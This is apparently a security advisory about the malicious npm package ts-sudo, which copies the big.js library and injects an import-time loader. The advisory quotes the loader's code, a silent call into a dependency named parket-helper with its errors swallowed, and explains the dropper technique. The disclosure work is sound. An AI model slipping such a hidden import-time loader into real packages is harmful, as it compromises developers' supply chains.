OSV ID
MAL-2026-6323
Ecosystem
npm
Summary
The package publishes under the name ts-sudo but ships a verbatim copy of the big.js v7.0.1 source ( big.js , big.mjs ) along with big.js's description, repository URL ( MikeMcl/big.js ), and keyword set ( bignumber , bigint ). Inside the otherwise-legitimate big.js source, a loader has been injected at big.js:606 : try { const doc = require("parket-helper"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . The same injection is present in big.mjs . This block fires automatically on require('ts-sudo') / import 'ts-sudo' , silently invoking parket-helper.from_str() — a package the consumer never chose to depend on. parket-helper is pulled into the install tree via the declared dependency "server-parket": "^3.8.1" in package.json:58 . The wrapper is benign-looking arithmetic code; the harmful behavior is delegated to the opaque dependency, and errors are swallowed to hide failures from the caller. The combination of (a) name/contents impersonation of a well-known library, (b) injected import-time call into an unrelated helper, and (c) reliance on a suspiciously-named transitive to deliver the payload is a textbook dropper pattern.
Source: amazon-inspector (1a6e18b2d6bef04dd8377fac8d9b20e5545f1ec39875fdd308adf118b6f319d1)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.